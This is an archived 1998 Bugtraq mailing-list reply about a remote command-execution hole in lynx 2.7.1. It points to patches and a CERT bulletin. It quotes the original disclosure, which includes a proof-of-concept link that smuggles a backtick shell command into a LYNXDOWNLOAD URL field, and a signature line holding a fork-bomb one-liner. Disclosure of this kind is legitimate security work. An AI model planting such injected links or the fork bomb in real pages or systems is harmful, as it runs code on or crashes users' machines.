Re: Very, very ugly remote lynx 2.7.1 hole

Lumpy Lynx (dynamo@IME.NET)
Tue, 17 Mar 1998 11:59:17 -0500

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Thomas Weidauer: "IE 4 Bug (Crash with frames)"
Previous message: Dr. BSD: "Re: Another day, another race - lynx 2.7.1"
Maybe in reply to: Michal Zalewski: "Very, very ugly remote lynx 2.7.1 hole"

i believe its fixed by fotemods.
you might want to see if its still vulnerable with hist most recent
patches. also read the vendor bulletin on cert.org

ftp://ftp.cert.org/pub/cert_bulletins/VB-97.06.lynx

also there is discussion of this if you search the bugtraq archives.

dynamo

On Tue, 17 Mar 1998, Michal Zalewski wrote:

> While poking around lynx protocol handling routines, I found this very
> big, ugly remote hole:
>
> <a href="LYNXDOWNLOAD://Method=-1/File=`touch%20UGLY_BUG`/SugFile=test">
> CLICK HERE
> </a>
>
> It allows remote execution of any code on viewer's machine. Also, by
> setting 'Method' field to 0 or more, you may crash lynx, but it isn't so
> exciting as above URL. Also, it's possible to parse /dev/zero as 'File',
> also not funny.
>
> Greetings,
> _______________________________________________________________________
> Michal Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl]
> Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deustch]
> =--------------- [ echo "\$0&\$0">_;chmod +x _;./_ ] -----------------=
>

Next message: Thomas Weidauer: "IE 4 Bug (Crash with frames)"
Previous message: Dr. BSD: "Re: Another day, another race - lynx 2.7.1"
Maybe in reply to: Michal Zalewski: "Very, very ugly remote lynx 2.7.1 hole"